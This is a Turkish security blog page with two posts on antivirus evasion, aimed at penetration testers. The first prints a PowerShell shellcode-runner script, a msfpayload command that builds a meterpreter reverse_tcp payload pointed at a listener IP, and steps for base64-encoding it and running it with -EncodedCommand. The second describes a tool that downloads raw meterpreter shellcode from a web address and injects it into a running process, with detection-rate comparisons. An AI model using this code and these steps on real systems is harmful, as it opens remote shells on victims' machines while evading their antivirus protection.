Komut Satırının Gücü Adına!



Benzer belgeler
Siber Savaş Yarışması

Hackerlar'ın Gözünden Flash Uygulamaları

OFİS 365 ÖĞRENCİ MAİL SİSTEMİ KULLANIM KLAVUZU. Office 365

SERMAYE PİYASASI KURULU İKİNCİ BAŞKANI SAYIN DOÇ. DR. TURAN EROL UN. GYODER ZİRVESİ nde YAPTIĞI KONUŞMA METNİ 26 NİSAN 2007 İSTANBUL

1. BÖLÜM: SOSYAL MEDYA

BÖLÜM 7 BİLGİSAYAR UYGULAMALARI - 1

Bellek Analizi ile Zararlı Yazılım Analizi

BQTEK SMS Asistan. Kullanım Kılavuzu. Doküman Versiyon: BQTEK

Yıllık İş İstatistikleri Sanayi ve Hizmet Soru Kağıdı Hazırlanışı

BİT ini Kullanarak Bilgiye Ulaşma ve Biçimlendirme (web tarayıcıları, eklentiler, arama motorları, ansiklopediler, çevrimiçi kütüphaneler ve sanal

İşletim Sisteminin Katmanları

YÜKSEKÖĞRETİM KURUMLARI ENGELLİLER DANIŞMA VE KOORDİNASYON YÖNETMELİĞİ (1) BİRİNCİ BÖLÜM. Amaç, Kapsam, Dayanak ve Tanımlar

QR Kodu Tarayıcısı / Okuyucusuna Uygun Uygulamalarda Kullanım İçin

USB KVM Switch. Ses özellikli ve 2 portlu USB KVM switch. Ses özellikli ve 4 portlu USB KVM switch

BİLGİ BELGE MERKEZİ VE YAYIN HİZMETLERİ

Tasarım Raporu. Grup İsmi. Yasemin ÇALIK, Fatih KAÇAK. Kısa Özet

Q-BIZ VIEWER KULLANIM KILAVUZU

ÖĞRENME FAALĠYETĠ GELĠġMĠġ ÖZELLĠKLER

MikroÖdeme Servis Dökümanı

ULAKBİM Danışma Hizmetlerinde Yeni Uygulamalar: Makale İstek Sistemi ve WOS Atıf İndeksleri Yayın Sayıları Tarama Robotu

Bülten Başlığı. Birincil Yazı Başlığı. İkincil Yazı Başlığı. İş Adı. İlgi çeken özel konular: Bu sayıda:

DEĞERLENDİRME NOTU: Mehmet Buğra AHLATCI Mevlana Kalkınma Ajansı, Araştırma Etüt ve Planlama Birimi Uzmanı, Sosyolog

Genel bilgiler Windows gezgini Kes Kopyala Yapıştır komutları. 4 Bilinen Dosya Uzantıları

Anonim Verilerin Lenovo ile Paylaşılması. İçindekiler. Harmony

Analiz aşaması sıralayıcı olurusa proje yapımında daha kolay ilerlemek mümkün olacaktır.

ÖNSÖZ. Sevgili MMKD üyeleri,

Topoloji değişik ağ teknolojilerinin yapısını ve çalışma şekillerini anlamada başlangıç noktasıdır.

5651 Sayılı Kanun Sayılı Kanun Maddesinin Amacı

Android Uygulamalarında Güvenlik Testi

SÜREÇ YÖNETİMİ VE SÜREÇ İYİLEŞTİRME H.Ömer Gülseren > ogulseren@gmail.com

İstemci Yönetimi ve Mobile Printing (Mobil Baskı) Çözümleri

Eğitim No/Eğitim Adı: 14-E Tedarikçi Barkod Uygulaması

ELEKTRİK ÜRETİM SANTRALLERİNDE KAPASİTE ARTIRIMI VE LİSANS TADİLİ

EPKAS (ELEKTRONİK PROJE KONTROL ARŞİVLEME SİSTEMİ) WEB KULLANIM KILAVUZU

Uzem Eğitmen Girişi. Şekil 1. Sisteme girdikten sonra Şekil 2 deki ekran karşımıza çıkacak. Bu ekrandaki adımları kısaca tanıyalım.

ABKR ABK 1036 GALVANİZ SİLO ISI KONTROLÖRÜ KULLANMA KILAVUZU

Ö RENME FAAL YET 9 Ö RENME FAAL YET 9

SÜRE BİLİŞİM TEKNOLOJİLERİ ÜNİTE 1: : BİLGİ VE TEKNOLOJİ DERS SAATİ: 7

Günlük Kent Gazetesi 4/c'yi de kaldır!.. cümlelerine yer verildi. Basın açıklamasında özetle; Kamuda çalıştırlan

: 3218 Sayılı Serbest Bölgeler Kanunu Genel Tebliği (Seri No: 1) nde Değişiklik Yapılmasına Dair Tebliğ (Seri No: 3) yayımlandı.

C: Kaydırma ruleti D: Pil yuvası E: Aç/Kapa anahtarı F: Bağlantı düğmesi G: Optik hareket algılayıcısı

KAHRAMANMARAŞ SÜTÇÜ İMAM ÜNİVERSİTESİ BİLİMSEL DERGİLER YÖNERGESİ BİRİNCİ BÖLÜM Amaç, Kapsam, Dayanak ve Tanımlar

TİSK GENEL SEKRETERİ BÜLENT PİRLER'İN DÜNYADA VE TÜRKİYE'DE ÇOCUK İŞGÜCÜNE İLİŞKİN GÖRÜŞ VE ÖNERİLERİDİR

Man In The Middle Attack Ve ARP Poisoning

Sunum Akışı. EBA Tanıtımı Modüller ve Yenilikler Mobil Uygulamalar Sayılarla EBA Soru Cevap Kapanış

TMS 33 HİSSE BAŞINA KAZANÇ. GÜNCELLEMELER ve YÜRÜRLÜK TARİHLERİ

Türkiye İlaç Sektörü Strateji Belgesi ve Eylem Planı Toplantısı

BİLGİ TEKNOLOJİLERİ VE İLETİŞİM KURULU KARARI

SİİRT ÜNİVERSİTESİ UZAKTAN EĞİTİM UYGULAMA VE ARAŞTIRMA MERKEZİ YÖNETMELİĞİ BİRİNCİ BÖLÜM. Amaç, Kapsam, Dayanak ve Tanımlar. Amaç

ZAĞNOS VADİSİ KENTSEL DÖNÜŞÜM PROJESİ

Bellek Analizi ile Zararlı Yazılım Analizi

ELEKTRİK PİYASALARI 2015 YILI VERİLERİ PİYASA OPERASYONLARI DİREKTÖRLÜĞÜ

B05.11 Faaliyet Alanı

İngilizce Öğretmenlerinin Bilgisayar Beceri, Kullanım ve Pedagojik İçerik Bilgi Özdeğerlendirmeleri: e-inset NET. Betül Arap 1 Fidel Çakmak 2

1 OCAK 31 ARALIK 2009 ARASI ODAMIZ FUAR TEŞVİKLERİNİN ANALİZİ

DERS SOSYOLOJİ KONU SOSYOLOJİNİN ARAŞTIRMA YÖNTEM VE TEKNİKLERİ

Üniversitelerde Yabancı Dil Öğretimi

META TRADER 4 MOBİL İŞLEM PLATFORMLARI KULLANMA KILAVUZU 1. KURULUM

İŞLEM BASAMAKLARI, KARŞILAŞILABİLECEK HATALAR ve ÇÖZÜM YOLLARI

MAKİNE VE MOTOR DERS NOTLARI 9.HAFTA

1. YAPISAL KIRILMA TESTLERİ

KAYHAM STRATEJİK PLANINA GÖRE 2014 YILI FAALİYET RAPORU

Koru1000. Koru1000. beklentilerinizin ötesinde!

I. EIPA Lüksemburg ile İşbirliği Kapsamında 2010 Yılında Gerçekleştirilen Faaliyetler

Pazarlama ve Reklamcılık Bölümü Pazarlama Programı Öğr. Gör. Cansu AYVAZ GÜVEN

BQ360 Modbus Dijital Giriş 24 Kanal. Kullanım Kılavuzu. Doküman Versiyon: BQTEK

İçindekiler Şekiller Listesi

ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM

Otizm lilerin eğitim hakkı var mıdır? Nedir ve nasıl olmalıdır?

KAPLAMA TEKNİKLERİ DERS NOTLARI

B02.8 Bölüm Değerlendirmeleri ve Özet

İMZALAMA ARACI. Kullanım Kılavuzu. Nisan 2016 ANKARA. İmzalama Aracı Kullanım Kılavuzu Nisan 2016 Versiyon : 1.0 1/15

ÇANKAYA BELEDİYE BAŞKANLIĞI STRATEJİ GELİŞTİRME MÜDÜRLÜĞÜ KURULUŞ, GÖREV, YETKİ, SORUMLULUK ÇALIŞMA USUL VE ESASLARINA İLİŞKİN YÖNETMELİK

Yedi Karat Kullanım Klavuzu. Yedi Karat nedir? Neden Karat?

Türkiye - Özbekistan Hükümetlerarası Karma Ekonomik Komisyonu I. Dönem Toplantısı Protokolunun Onaylanması Hakkında Karar Karar Sayısı: 2001/2585

Hızlı Başlangıç Rehberi. Türkçe VTE-1016

SİRKÜLER. 1.5-Adi ortaklığın malları, ortaklığın iştirak halinde mülkiyet konusu varlıklarıdır.

Özgür Yazılımlar ile VoIP Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı

Autodesk Building Design Suite Sorular ve Cevapları

AIMCO AIMCO. Kullanım Kılavuzu. Mayıs 2016

RECEP TAYYİP ERDOĞAN ÜNİVERSİTESİ 2015 MALİ YILI ADALET MESLEK YÜKSEKOKULU FAALİYET RAPORU

ESRA ÖZGECAN ULUSOY DÖRTGEN DİZAYN HAZIR ARABULUCULUK WEB SİTESİ HİZMET SATIŞ SÖZLEŞMESİ HAZIR ARABULUCUK WEB SİTESİ MESAFELİ HİZMET SATIŞ SÖZLEŞMESİ

IŞIK ĐZLEYEN ROBOT PROJESĐ LIGHT FOLLOWĐNG ROBOT PROJECT. Hasan ALTAŞ, Sinop Ünv. Meslek Yüksekokulu Mekatronik Bölümü, SĐNOP

HAM PUAN: Üniversite Sınavlarına giren adayların sadece netler üzerinden hesaplanan puanlarına hem puan denir.

DIGIAC 2000 Deney Seti PAT İŞLEMCİ KARTI :

6. ODA MERKEZ BÜRO İŞLEYİŞİ

YÖNETMELİK. a) Basamak kontrolü: On beş basamaklı IMEI numarasının son basamağının doğruluğunun kontrolünü,

TS7200 PLATFORMU ÜZERİNDE SERİ PORT-ETHERNET DÖNÜŞTÜRÜCÜ UYGULAMASI

Türkiye Ekonomi Politikaları Araştırma Vakfı Değerlendirme Notu Sayfa1

ÇANKAYA BELEDİYE BAŞKANLIĞI SOSYAL YARDIM İŞLERİ MÜDÜRLÜĞÜ KURULUŞ, GÖREV, YETKİ, SORUMLULUK ÇALIŞMA USUL VE ESASLARINA İLİŞKİN YÖNETMELİK

VEZNE PROGRAMINDA POSTA ÜCRETİ İLE İLGİLİ YAPILAN DÜZENLEMELER (Vezne Sürüm: )

BULUŞ BİLDİRİM FORMU / APARAT

HALK EĞİTİMİ MERKEZLERİ ETKİNLİKLERİNİN YÖNETİMİ *

Daha fazla seçenek için daha iyi motorlar

FOREACH V1.8. Su Arıtma Sistemleri Bakım Takip ve Ön Muhasebe Programı

TKY de Karar Almaya Katılımın ve Örgütsel Bağlılığın Kişisel Performansa Etkisi

Windows VISTA Ultimate Kurulumu ve Yönetimi

Oksijen, flor ve neon elementlerinin kullanıldığı alanları araştırınız.

MOTİVASYON(GÜDÜLEME) VE KURAMLARI

Mak-204. Üretim Yöntemleri II. Vida ve Genel Özellikleri Kılavuz Çekme Pafta Çekme Rayba Çekme

Transkript:

Komut Satırının Gücü Adına! Yapılan istatistiklere göre 2011 yılının son çeyreğinde Windows XP işletim sistemi ile Windows 7 işletim sistemi arasındaki kullanım oranları birbirine oldukça yakınken, 2012 yılının son çeyreğinde Windows 7 işletim sistemi kullanım oranının Windows XP işletim sistemi kullanım oranını ikiye katlamış olması, penetrasyon testi/sızma testi gerçekleştiren bilişim güvenliği uzmanları arasında tek bir nedenden ötürü memnuniyetle karşılandı o da Windows 7 ile yüklü gelen Powershell den başkası değildi. Powershell, Mircosoft tarafından yönetim görevlerini otomatize etmek amacıyla geliştirilmiş,.net sınıflarından faydalanarak betikler (script) geliştirilmesine imkan tanıyan yeni nesil komut satırıdır. İlk sürümü 2006 yılında Microsoft tarafından yayınlanan Powershell in ikinci sürümü 2009 yılında Windows 7 ve Windows 2008 işletim sistemlerine entegre edilmiş üçüncü sürümü ise Windows 8 ve Windows Server 2012 işletim sistemlerine entegre edilerek kullanıcıların kullanımına sunulmuştur. Powershell, güvenlik önlemi adına güvenilir kaynaklar tarafından geliştirilmemiş olan betiklerin çalıştırılmasına varsayılan (default) olarak izin vermez. Kurumsal ortamlarda da daha önce Powershell in gücüne tanıklık etmiş olan Sistem Yöneticileri çoğunlukla Etki Alanı Denetleyicisi (DC) üzerinden Powershell in güvenilir olmayan kaynaklardan indirilen betiklerin çalıştırılmasını yasaklamaktadırlar. Ancak ve ancak sistem yöneticileri de dahil çoğu son kullanıcı bu betiklerin Command ve EncodedCommand (Base64 ile kodlanmış (encode) betik) ile de çalıştırıldığından haberdar değildir. Normal şartlarda betik çalıştırmaya

izin vermeyen politikalar Command ve EncodedCommand ile atlatılabilmektedir. Powershell in betiklerde.net sınıflarını kullanmaya imkan tanıması, C# ile yazılmış bir kod parçasını çalıştırma (runtime) esnasında derlemesi ve çalıştırması sayesinde örneğin komut enjeksiyonu (command injection) zafiyeti olan bir Windows Server 2008 işletim sisteminin komut satırına uzaktan erişmek (remote shell) veya basit şifre tahmini ile sızılan bir Windows 7 işletim sisteminin Metasploit e bağlanmasını sağlamak mümkündür. En önemlisi ise Powershell sayesinde Antivirüs yazılımının kullanıldığı bir sistemde Antivirüs e yakalanmadan istenilen kabuk kodu çalıştırabilmektedir. Örnek olarak Powershell üzerinden kabuk kodu çalıştırmak için Matt Graeber tarafından geliştirilen aşağıdaki betiği kullanabilirsiniz. $code = {$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpaddress, uint dwsize, uint flallocationtype, uint flprotect);[dllimport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpthreadattributes, uint dwstacksize, IntPtr lpstartaddress, IntPtr lpparameter, uint dwcreationflags, IntPtr lpthreadid);[dllimport("msvcrt.dll")]public static extern IntPtr memset(intptr dest, uint src, uint count);';$winfunc = Add-Type memberdefinition $code -Name "Win32" -namespace Win32Functions passthru;[byte[]];[byte[]]$sc64 = ;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.length -gt 0x1000) {$size = $sc.length};$x=$winfunc::virtualalloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.length-1);$i++) {$winfunc::memset([intptr]($x.toint32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };} Betiğin çalışabilmesi için $sc64 değişkenine hedef işlemci mimarisine uygun olan (x32 veya x64) kabuk kodunu kopyalamanız gerekmektedir. $sc64 değişkenine atanacak kabuk kodunu aşağıdaki şekilde oluşturabilirsiniz.

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 PORT=4444 EXITFUNC=thread C sed '1,6d;s/[";]//g;s/\\/,0/g' tr -d '\n' cut -c2- sed 's/^[^0]*\(0.*\/\*\).*/\1/' sed 's/.\{2\}$//' tr -d '\n' more Ardından betik bloğunu Powershell komut satırına kopyaladıktan sonra Base64 ile kodlamak için [convert]::tobase64string([text.encoding]::unicode.getbytes($code)) kodunu çalıştırmanız gerekmektedir. Son olarak Backtrack de hazır bulunan Meterpreter ile hedef sistemi bağlamak için az önce elde ettiğiniz BASE64 ile kodlanmış betiği hedef sistemde powershell -EncodedCommand şeklinde çalıştırarak Meterpreter ın Antivirüs yüklü hedef sistemde başarıyla çalışmasını sağlayabilirsiniz. Sonuç olarak Powershell üstün özelliklerinin yanı sıra mevcut güvenlik kontrollerinin yetersiz olması nedeniyle kötüye kullanıma açık olduğu için

kullanımına ihtiyaç duyulmayan sistemlerden kaldırılmasını tavsiye ederim. Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim. Birdirbir Penetrasyon (sızma) testi gerçekleştirenlerin çoğu hem sunduğu sayısız imkanlar, hem açık kaynak kodlu olması ve hem de ücetsiz olması nedeniyle Metasploit istismar aracını kullanmayı tercih etmektedirler. Metasploit in en beğenilen özelliklerinden biri şüphesiz barındırmış olduğu Meterpreter aracıdır. Meterpreter, tamamen istismar edilen hedef işlemin (process) içinde yani hafızada çalışabilen, hedef sistemin diski ile herhangi bir etkileşimde bulunmadığı için de standart antivirüs yazılımları tarafından yakalanmayan, desteklediği modüller sayesinde hedef sistemdeki şifrelerin hashlerini toplamaktan, sniffer olarak çalışmaya, hedef sistemin ekranını kayıt etmekten, arka kapı olarak hizmet vermeye kadar bir çok özelliği üzerinde barındıran erişim sisteme erişim sağlayan yardımcı bir araçtır. Zaman içinde Meterpreter ın bu denli güçlü, sinsi olması, Antivirüs üreticilerinin de gözünden kaçmamış ve çoğu üretici Meterpreter ın yürütülebilir programının tespit edilebilmesi için imza veritabanlarını güncellemek zorunda kalmışlardır. Durum böyle olunca da yürütülebilir Meterpreter programı ile hedef sisteme sızmaya çalışan pentesterlar için Meterpreter ın Antivirüs yazılımları tarafından tespit edilmemesi büyük önem arz etmiştir ve penetrasyon testlerinde çeşitli kodlama (encode) yöntemleri ile oluşturulan Meterpreter ın kullanımı zorunlu hale gelmiştir. Kodlama yöntemleri Antivirüs yazılımları tarafından tanındığı için bu yöntemi tanıyan, sezgisel tanıma yöntemi kullanan Antivirüs yazılımları kodlanmış Meterpreter ı tanıyamasa da programın kodlanmış olduğunu tespit ettiğin için alarm üretebilmektedir. Meterpreter, hem kabuk kodunu (shellcode) içeren yürütülebilir program (executable) olarak hem de istismar aracının (exploit) ham (raw) kabuk kodu olarak üretilebilmekte ve kullanabilmektedir. Tek fark, ham olarak üretilmesi (generate -t raw) durumunda bunu çalıştıracak ilave bir programa ihtiyaç duymaktadır. Aslında işi yapan kod, ham koddur (payload/shellcode) ve sisteme sızılma kısmında en kilit noktadır. Fakat mantığını anlayamadığım bir nedenden ötürü Antivirüs geliştiricileri (41 taneden 5 tanesi hariç) yürütülebilir program için imza oluşturmuştur. Durum böyle olunca da sistemde çalışan ve internetten indirdiği ham kodu (örnek: meterpreter reverse tcp kodu) indirip hedef işleme (process) enjekte (code injection) eden Code Injection gibi bir araç, Meterpreter ın Metasploit ile haberleşmesini

herhangi bir kodlama (encode) yöntemi kullanmadan sağlayabilmektedir. Teoride güzel de pratikte nasıl oluyor diye soracak olursanız; Öncelikle Metasploit ile hem ham hem de yürütülebilir program olarak Meterpreter oluşturalım. Ardından ham halini VirusTotal sitesine yükleyelim. (Rapora buradan ulaşabilirsiniz.) 41 Antivirüs yazılımından sadece 5 tanesi (AVG, Avast, Symantec, Mcafee GW Edition, GData) kodlanmamış (encode) Meterpreter ı tespit edebilmektedir.

Ardından yürütülebilir program (executable) halini VirusTotal sitesine yükleyelim. (Rapora buradan ulaşabilirsiniz. 41 Antivirüs yazılımından sadece 32 tanesi kodlanmamış (encode) Meterpreter ı tespit edebilmektedir.

Örnek olarak en güncel imzalara sahip NOD32 Antivirüs yazılımı kurulu olan sisteme belirtilen bir web adresinden ham kodu indiren ve hedef işleme (process) kod enjeksiyonu yapmak için hazırlamış olduğum Code Injection Tool aracı ile enjeksiyon yapalım ve mutlu sona ulaşalım.

Kod enjeksiyonu için geliştirmiş olduğum Code Injection aracı burada yer alan adımları harfiyen yerine getirmektedir. Aracın VirusTotal raporuna da buradan ulaşabilirsiniz. Programın işlevi, belirtilen web adresinden indirdiği kodu yine belirtilen PID veya işleme (process) enjekte etmek ve çalıştırılmasını sağlamaktır. Sonuç olarak mantıklı ve anlamlı imza setine sahip olmayan Antivirüs yazılımlarının çok zaman ve efor sarfetmeden birdirbir oynarcasına atlatılması mümkündür. Konuyu kısaca özetleyen videoyu izlemenizi tavsiye eder, herkese güvenli günler dilerim